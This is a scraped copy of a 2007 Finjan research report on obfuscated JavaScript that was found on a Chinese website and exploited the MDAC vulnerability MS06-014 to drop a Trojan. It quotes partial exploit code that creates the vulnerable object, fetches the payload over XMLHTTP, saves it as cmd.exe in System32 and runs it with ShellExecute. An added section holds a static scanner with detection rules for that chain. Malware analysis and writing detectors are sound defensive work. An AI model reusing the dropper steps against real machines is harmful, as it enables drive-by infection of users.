Finjan Malicious Code Research Center. Malicious Page of the Month
- Merry Cummings
- 8 years ago
Finjan Malicious Code Research Center
Malicious Page of the Month
August 2007
Copyright Finjan Software Inc. and its affiliates and subsidiaries ("Finjan"). All rights reserved. All text and figures included in this publication are the exclusive property of Finjan and are for your personal and non-commercial use. You may not modify, copy, distribute, transmit, display, perform, reproduce, publish, license, create derivative works from, transfer, use or sell any part of its content in any way without the express permission in writing from Finjan. Information in this document is subject to change without notice and does not present a commitment or representation on the part of Finjan.

The Finjan technology and/or products and/or software described and/or referenced to in this material are protected by registered and/or pending patents including U.S. Patents No , , , , , , , , , , , , , , , , and may be protected by other U.S. Patents, foreign patents, or pending applications.

Finjan, Finjan logo, Vital Security, Vulnerability Anti.dote and Window-of-Vulnerability are trademarks or registered trademarks of Finjan. Sophos is a registered trademark of Sophos plc. McAfee is a registered trademark of McAfee Inc. Kaspersky is a registered trademark of Kaspersky Lab. SurfControl is a registered trademark of SurfControl plc. Microsoft and Microsoft Office are registered trademarks of Microsoft Corporation. All other trademarks are the trademarks of their respective owners.

For additional information, please visit or contact one of our regional offices:

USA
2025 Gateway Place, Suite 180, San Jose, CA 95110, USA
Toll Free: FINJAN 8 Tel: Fax: salesna@finjan.com
Chrysler Building, 405 Lexington Avenue, 35th Floor, New York, NY 10174, USA
Tel: Fax: salesna@finjan.com

Israel/APAC
Hamachshev St. 1, New Industrial Area, Netanya, Israel
Tel: +972 (0) Fax: +972 (0) salesint@finjan.com

Europe
Westmead House, Westmead, Farnborough, GU14 7LP, UK
Tel: +44 (0) Fax: +44 (0) salesuk@finjan.com
Alte Landstrasse 27, Ottobrun, Germany
Tel: +49 (0) Fax: +49 (0) salesce@finjan.com
Printerweg AD Amersfoort, The Netherlands
Tel: +31 (0) Fax: +31 (0) salesne@finjan.com

info@finjan.com
Internet:
Table of Contents

1 Introduction
1.1 The Growing Ease of Malicious Code Propagation
2 Obfuscated Code Revisited
2.1 Using Legitimate Tools to Create Malicious Code
2.2 Do Other Web Security Products Block This Malicious Code?
3 Conclusion
4 About MCRC
5 About Finjan
1 Introduction

This analysis is geared towards helping our customers understand how current threats are created and the methodologies used by malware writers to heighten the infection rate and evade conventional security measures. Finjan's findings over the past months indicate that the use of code obfuscation is no longer considered a special technique, nor is it a new trend in the web security field. Code obfuscation has become the de facto standard for malicious code propagation, so much so that coming across malicious code that is not obfuscated in some form is a rare occurrence. The obfuscation is usually generated by one of the latest versions of the current toolkits, which are being sold on the Internet.

For additional information on malicious toolkits for sale, please review the MPOM May
For additional information on the evolution of code obfuscation in the web security field, please visit Finjan's Security Center.

1.1 The Growing Ease of Malicious Code Propagation

Due to the rapid growth in the availability of malicious code on the web, security vendors are facing an uphill battle. Creating signatures for each and every exploit of the various toolkits is obviously an exhausting process. Nor are signature-based methods particularly effective, as the dynamic nature of the code obfuscation renders signaturing the underlying code almost impossible. While trying to keep pace with the new vulnerabilities and new security threats, security vendors also need to monitor the available toolkits and their various versions. Each toolkit usually provides several different exploits which can be updated and changed every day, if not every hour.

Code obfuscation as a technique wasn't originally developed for spreading malicious content on the web, but rather was used for legitimate purposes. It can be easily generated by automated utilities. Such utilities are available on the web (some of them for free), and are very easy to use, especially by the crimeware authors. For additional information on Legitimate Obfuscation Utilities, please visit MCRC Blog post.

This edition of the Malicious Page of the Month focuses on a successful exploitation using one of these utilities which was discovered in the wild. The malicious code was found on a high-traffic website, thus providing proof of concept for a widespread problem in the web security arena.
2 Obfuscated Code Revisited

Following is an example of a Chinese website being used for spreading malicious content. One of the URLs in the site contains malicious code which eventually results in the download and execution of a piece of crimeware on the victim machine. Figure 1 shows the growth in the site's traffic during July once the malicious content had been uploaded.

Figure 1 Traffic rate of malicious site once a malicious content has been uploaded

One of the malicious URLs is responsible for the installation of a malicious ANI spoofed file, two iframes and one script on the end-user PC (see Figure 2). Each one points to a well-written exploit of known vulnerabilities.

Figure 2 Malicious URL found on the site contains malicious code

Let's take a deeper look at the malicious JavaScript file which is being downloaded each time a user visits the above URL. The malicious file contains sophisticated JavaScript code; nevertheless, just like standard obfuscated code, it uses a custom decryption function to execute the malicious code dynamically. Later we will show that this sophisticated script was generated through a free utility, developed by a JavaScript expert, and most likely not for malicious purposes.

Figure 3 Obfuscated malicious JavaScript generated from a legitimate and free obfuscation utility

It should be noted that the obfuscation technique used here is much more advanced from a technical standpoint than examples previously encountered in the wild, further raising the bar for security vendors. Full code analysis of the above script is available at MCRC Blog post.

When decrypting the obfuscated code shown in Figure 3, a well-known and very common exploit was exposed. This exploit uses the Microsoft Data Access Components Vulnerability (MS06-014). Its severity is categorized as highly critical, as it can result in remote code execution on the victim machine. Successful exploitation will result in downloading and running a crimeware Trojan on the victim machine. Following is a brief description of the attack.

Step 1: Creating the vulnerable object:

    var qbicl3=window["document"]["createelement"]("object");
    qbicl3["setattribute"]("classid","clsid:bd96c556-65a3-[removed]-00C04FC29E36");
Step 2: Requesting the crimeware Trojan using AJAX technology, saving it under the Windows\System32 folder on the victim machine, naming it cmd.exe and then executing it by using the Shell.Application object.

    try { dl='
    var[removed]l3["createobject"]("microsoft.x"+"m"+"l"+"h"+"t"+"t"+"p","");
    var[removed]j7=hiymfh6["getspecialfolder"](0)[removed]n4["responsebody"]);
    _5["SaveToFile"](fname1,2);
    [REMOVED]BuildPath"](j7+'\\system32','cmd.exe');
    OWSDdEfq_8["ShellExecute"]

2.1 Using Legitimate Tools to Create Malicious Code

The obfuscation technique and utility used in this case might lead one to believe that this looks like a case of legitimate code obfuscation, which by chance was not being signatured by security vendors. However, this is not a single instance. In addition to this example, Finjan's MCRC researchers have encountered several cases where malicious code is being obfuscated in the same way. The same obfuscation tool shown in the example above was also used for creating additional malicious content, which has been recently seen in the wild. And the same scenario prevails: once the malicious code is decrypted, several security vendors are able to detect the known exploits. However, as long as the code is obfuscated, the malicious code bypasses these vendors' products and users are exposed to well-known security threats.

So why not take some of the known exploits, obfuscate them using one or more of the free tools available on the web until one of them bypasses the most popular security applications, and upload it to the Internet? Crimeware authors can even use free online tools to test their code against a variety of security products before releasing them, in order to verify their ability to avoid detection. Unfortunately, it would appear that it is just a question of time until this very scenario takes place (all the tools are available for free).
As this report shows, without the ability to understand what the obfuscated code tries to do behind the scenes, it becomes very hard to detect whether the code is malicious or not. Many signature-based products can identify the obfuscation function itself and have even created signatures for such instances. Now that hackers are using legitimate obfuscation utilities to mask malicious code, these scenarios cannot be blocked across the board by signature-based solutions, without the risk of introducing a major false positive problem.
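An added example, not part of Finjan's report or of any Finjan product: the literal splitting and bracket-notation property access visible in the Step 2 fragment defeat a text signature, while folding the literals first exposes the same request, save and execute behaviour. The sample scripts, rule names and function names are constructed for illustration, and the outer decryption layer shown in Figure 3 is not handled here.

```javascript
'use strict';

// Constructed, inert sample modelled on the fragments quoted in Step 1 and
// Step 2: no CLSID, no URL, undefined variables. It is only ever scanned.
const SAMPLE = String.raw`
var a1=window["document"]["createElement"]("object");
var b2=a1["Create"+"Object"]("microsoft.x"+"m"+"l"+"h"+"t"+"t"+"p","");
var c3=a1["Create"+"Object"]("Sh"+"ell.Appl"+'ication',"");
s5["Save\x54oFile"](fname1,2);
c3["Shell"+"Execute"](fname1);
`;

// Constructed benign script that also concatenates strings and uses brackets.
const BENIGN = String.raw`
var t="Hello, "+"world";
el["setAttribute"]("title",t);
xhr.open("GET","/api/items");
`;

// One string literal, either quote style, escapes allowed, no raw newline.
const STR = /(["'])((?:\\.|(?!\1)[^\\\n])*)\1/g;
// A literal followed by zero or more `+ literal` continuations.
const CHAIN = /(["'])(?:\\.|(?!\1)[^\\\n])*\1(?:\s*\+\s*(["'])(?:\\.|(?!\2)[^\\\n])*\2)*/g;

// Turn the body of a literal into its runtime value (\xNN, \uNNNN, \n, \", ...).
function decodeLiteral(body) {
  return body.replace(/\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([\s\S]))/g,
    (_, hex, uni, ch) => {
      if (hex || uni) return String.fromCharCode(parseInt(hex || uni, 16));
      return { n: '\n', r: '\r', t: '\t' }[ch] ?? ch;
    });
}

// Replace every chain of concatenated literals with one double-quoted literal.
function foldStrings(src) {
  return src.replace(CHAIN, (chain) => {
    const parts = [...chain.matchAll(STR)].map((m) => decodeLiteral(m[2]));
    return JSON.stringify(parts.join(''));
  });
}

// obj["name"] -> obj.name, only where the bracket follows an expression,
// so array literals such as x = ["name"] are left alone.
function dotifyBrackets(src) {
  return src.replace(/(?<=[\w$)\]])\[\s*"([A-Za-z_$][\w$]*)"\s*\]/g, '.$1');
}

function normalize(src) {
  return dotifyBrackets(foldStrings(src));
}

// Behaviour indicators taken from the attack description in Step 1 and Step 2.
const RULES = [
  { id: 'object-element', re: /\.createElement\s*\(\s*"object"\s*\)/i },
  { id: 'activex-xmlhttp', re: /\.CreateObject\s*\(\s*"(?:microsoft|msxml2)\.xmlhttp/i },
  { id: 'save-to-file', re: /\.SaveToFile\s*\(/i },
  { id: 'shell-execute', re: /\.ShellExecute\s*\(/i },
];

function scan(text) {
  return RULES.filter((r) => r.re.test(text)).map((r) => r.id);
}

// Compare what the rules see before and after normalization. The chain flag
// needs all three stages of Step 2: request, write to disk, execute.
function analyse(src) {
  const raw = scan(src);
  const normalized = scan(normalize(src));
  const need = ['activex-xmlhttp', 'save-to-file', 'shell-execute'];
  const dropperChain = need.every((id) => normalized.includes(id));
  return { raw, normalized, dropperChain };
}

console.log(JSON.stringify(analyse(SAMPLE)));
console.log(JSON.stringify(analyse(BENIGN)));
```

This is a static heuristic: it does not parse comments or regular-expression literals, and anything built at run time by a decryption routine still requires executing or emulating the script.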
2.2 Do Other Web Security Products Block This Malicious Code?

We posted the malicious file on in order to see how security solutions handle this sophisticated, yet easy-to-generate, malicious file. Virustotal.com runs the code against 32 leading security products (see Figure 4) in a non-benchmark methodology, so using this online service is just a reference sample. According to the Virustotal report, none of these security products detected the obfuscated JavaScript file containing malicious code.

Figure 4 Virus Total scanning report on the obfuscated malicious script (July 31, 2007)
A second posting to Virustotal.com of the decrypted malicious file indicates that only 2 of the 32 security vendors were able to detect the decrypted malicious code.

Figure 5 Virus Total scanning report on the encrypted malicious file
3 Conclusion

The way to detect modern malicious code is to be able to understand what the code intends to do, before it does it. As website content is becoming more volatile, and domain names can be set up for brief periods of time, the task of keeping track of the malicious content on the WWW is becoming ever more difficult. Attempts to pattern malicious code and create signatures, or to categorize known malicious sites, are clearly insufficient when it comes to providing adequate protection against today's dynamic web threats.

As virtually all modern attacks use code obfuscation and other anti-forensic methods, security companies find it more difficult to put their hands on malicious code, analyze it in their labs and create a signature for it. Anti-virus, reputation-based services and URL filtering solutions are potentially limited in their ability to cope with attacks that make use of constantly changing malicious code. The only way to stop dynamically obfuscated code and similar types of advanced hacking techniques is to analyze and understand the code embedded within web content on-the-fly before it reaches the end users.

Finjan detects and blocks malicious code that uses obfuscation and other types of anti-forensic techniques. The figures below illustrate Finjan's detection of the malicious code presented in this report. Utilizing real-time content inspection technology, Finjan achieves the highest rate of malicious code detection and prevention, by analyzing each and every piece of web content in real-time, regardless of its original source. This is the preferred approach for identifying the true intent of the code that enables blocking it before it executes on the end user machine.

Figure 6 Finjan Vital Security blocks access to the infected Chinese site
Figure 7 Vital Security detailed scanning report on the obfuscated malicious file
Figure 8 Vital Security scanning report on the decrypted malicious file

4 About MCRC

Malicious Code Research Center (MCRC) is the leading research department at Finjan, dedicated to the research and detection of security vulnerabilities in Internet and applications as well as other popular applications. MCRC's goal is to continue to be steps ahead of hackers attempting to exploit open platforms and technologies to develop malicious code such as Spyware, Trojans, Phishing attacks, worms and viruses. MCRC researchers work with the world's leading software vendors to help patch their security holes, as well as contribute to the development of next generation defense tools for Finjan's proactive secure content management solutions. For more information, visit our MCRC subsite.
5 About Finjan

Finjan is a global provider of secure web gateway solutions for the enterprise market. Our real-time, appliance-based web security solutions deliver the most effective shield against web-borne threats, freeing enterprises to harness the web for maximum commercial results. Finjan's real-time web security solutions utilize patented behavior-based technology to repel all types of crimeware threats arriving via the web, such as spyware, phishing, Trojans, obfuscated code and other malicious code, securing businesses against unknown and emerging threats, as well as known malware. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including IDC, Butler Group, SC Magazine, eweek, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan's award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential. For more information about Finjan, please visit
More informationA New Approach to Assessing Advanced Threat Solutions
A New Approach to Assessing Advanced Threat Solutions December 4, 2014 A New Approach to Assessing Advanced Threat Solutions How Well Does Your Advanced Threat Solution Work? The cyber threats facing enterprises
More informationFOR MAC. Quick Start Guide. Click here to download the most recent version of this document
FOR MAC Quick Start Guide Click here to download the most recent version of this document ESET Cyber Security Pro provides state-of-the-art protection for your computer against malicious code. Based on
More informationProtection for Mac and Linux computers: genuine need or nice to have?
Protection for Mac and Linux computers: genuine need or nice to have? The current risk to computers running non-windows platforms is small but growing. As Mac and Linux computers become more prevalent
More informationCurrent Threat Scenario and Recent Attack Trends
Current Threat Scenario and Recent Attack Trends Anil Sagar Additional Director Indian Computer Emergency Response Team (CERT-In) Objectives Current Cyber space Nature of cyberspace and associated risks
More informationNetDefend Firewall UTM Services
NetDefend Firewall UTM Services Unified Threat Management D-Link NetDefend UTM firewalls integrate an Intrusion Prevention System (IPS), gateway AntiVirus (AV), and Web Content Filtering (WCF) for superior
More informationModern Cyber Threats. how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure. Axel Wirth
Modern Cyber Threats how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure Axel Wirth Healthcare Solutions Architect Distinguished Systems Engineer AAMI 2013 Conference
More informationEvaluating the Perceptions of People towards Online Security
Section 2 Information Systems Security & Web Technologies and Security Evaluating the Perceptions of People towards Online Security Abstract N.K.Jayakumar and A.D.Phippen Network Research Group, University
More information2. From a control perspective, the PRIMARY objective of classifying information assets is to:
MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected
More informationCyber Security Solutions for Small Businesses Comparison Report: A Sampling of Cyber Security Solutions Designed for the Small Business Community
Cyber Security Solutions for Small Businesses Comparison Report: A Sampling of Cyber Security Solutions Designed for the Small Business Community A Sampling of Cyber Security Solutions Designed for the
More informationEndpoint Security: Moving Beyond AV
Endpoint Security: Moving Beyond AV An Ogren Group Special Report July 2009 Introduction Application whitelisting is emerging as the security technology that gives IT a true defense-in-depth capability,
More informationWillem Wiechers 3 rd March 2015
Willem Wiechers 3 rd March 2015 1 Why do we want Malware & Virus Protection? To make our computers save Wish to keep our data private Wish to have a safe environment to do our online banking, shopping,
More informationWEB PROTECTION. Features SECURITY OF INFORMATION TECHNOLOGIES
WEB PROTECTION Features SECURITY OF INFORMATION TECHNOLOGIES The web today has become an indispensable tool for running a business, and is as such a favorite attack vector for hackers. Injecting malicious
More informationEdge-based Virus Scanning
APPLICATION NOTE Edge-based Virus Scanning 658 Gibraltar Court Milpitas, CA 95035 Phone: 408-635-8400 Fax: 408-635-8470 www.servgate.com i Edge-based Virus Scanning APPLICATION NOTE All product names referenced
More informationZone Labs Integrity Smarter Enterprise Security
Zone Labs Integrity Smarter Enterprise Security Every day: There are approximately 650 successful hacker attacks against enterprise and government locations. 1 Every year: Data security breaches at the
More informationActive Threat Control
Active Threat Control Proactive Protection Against New and Emerging Threats Why You Should Read this White Paper The unprecedented rise of new threats has deemed traditional security mechanisms both ineffective
More informationInternet basics 2.3 Protecting your computer
Basics Use this document with the glossary Beginner s guide to Internet basics 2.3 Protecting your computer How can I protect my computer? This activity will show you how to protect your computer from
More informationGOING BEYOND BLOCKING AN ATTACK
Websense Executive Summary GOING BEYOND BLOCKING AN ATTACK WEBSENSE TRITON VERSION 7.7 Introduction We recently announced several new advanced malware and data theft protection capabilities in version
More informationSOLUTION CARD WHITE PAPER
WHITE PAPER Why Education is Among the Worst Affected Industries by Malware The Contradiction Between Perceived Anti-Virus Readiness and Actual Malware Infection Rates in the Education Industry About This
More informationwhite paper Malware Security and the Bottom Line
Malware Security Report: Protecting Your BusineSS, Customers, and the Bottom Line Contents 1 Malware is crawling onto web sites everywhere 1 What is Malware? 2 The anatomy of Malware attacks 3 The Malware
More informationComputer Security Maintenance Information and Self-Check Activities
Computer Security Maintenance Information and Self-Check Activities Overview Unlike what many people think, computers are not designed to be maintenance free. Just like cars they need routine maintenance.
More informationBest Practices in Deploying Anti-Malware for Best Performance
The Essentials Series: Increasing Performance in Enterprise Anti-Malware Software Best Practices in Deploying Anti-Malware for Best Performance sponsored by by Eric Schmidt Be st Practices in Deploying
More informationA progressive and integrated approach to protecting corporate networks
A progressive and integrated approach to protecting corporate networks Kaspersky Open Space Security is a suite of products that offers security coverage for all types of network endpoints, from mobile
More informationQUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY
QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY EXPLOIT KITS UP 75 PERCENT The Infoblox DNS Threat Index, powered by IID, stood at 122 in the third quarter of 2015, with exploit kits up 75 percent
More informationMcAfee Global Threat Intelligence File Reputation Service. Best Practices Guide for McAfee VirusScan Enterprise Software
McAfee Global Threat Intelligence File Reputation Service Best Practices Guide for McAfee VirusScan Enterprise Software Table of Contents McAfee Global Threat Intelligence File Reputation Service McAfee
More informationComputer Viruses: How to Avoid Infection
Viruses From viruses to worms to Trojan Horses, the catchall term virus describes a threat that's been around almost as long as computers. These rogue programs exist for the simple reason to cause you
More informationNext-Generation Endpoint Security Beats Malware Variants Through Behavior-Based Analysis
Technology Spotlight Next-Generation Endpoint Security Beats Malware Variants Through Behavior-Based Analysis Sponsored by: Stormshield Duncan Brown January 2016 INTRODUCTION Enterprises are increasingly
More information